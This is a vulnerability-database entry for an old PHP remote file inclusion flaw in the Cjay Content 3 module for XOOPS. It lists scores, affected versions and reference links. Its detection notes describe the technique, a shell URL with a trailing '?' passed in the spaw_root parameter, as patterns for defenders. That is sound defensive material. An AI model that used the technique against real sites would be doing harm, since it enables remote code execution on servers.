CVE-2007-3220
published 2007-06-14CVE-2007-3220: PHP remote file inclusion vulnerability in admin/editor2/spaw_control.class.php in the Cjay Content 3 module for XOOPS allows remote attackers to execute…
PriorityP349medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
62.75%
99.1th percentile
PHP remote file inclusion vulnerability in admin/editor2/spaw_control.class.php in the Cjay Content 3 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: this may be a duplicate of CVE-2006-4656.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xoops | cjay_content_module | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect HTTP requests targeting spaw_control.class.php with a URL-based spaw_root parameter, indicating remote file inclusion attempt. ↗
- →The trailing '?' appended to the injected shell URL is a classic RFI technique to nullify the remainder of the include path; look for query strings ending in '?' in the spaw_root parameter. ↗
- →Exploitation requires register_globals=ON and magic_quotes=OFF; these server configurations should be flagged as high-risk in combination with this module's presence. ↗
- ·Exploitation is only possible when PHP register_globals is ON and magic_quotes is OFF — detections should account for this prerequisite environment. ↗
- ·This CVE may be a duplicate of CVE-2006-4656; correlate findings with that CVE to avoid double-counting incidents. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://osvdb.org/36307http://secunia.com/advisories/25665http://www.vupen.com/english/advisories/2007/2206https://exchange.xforce.ibmcloud.com/vulnerabilities/34856https://www.exploit-db.com/exploits/4070http://osvdb.org/36307http://secunia.com/advisories/25665http://www.vupen.com/english/advisories/2007/2206https://exchange.xforce.ibmcloud.com/vulnerabilities/34856https://www.exploit-db.com/exploits/4070
2007-06-14
Published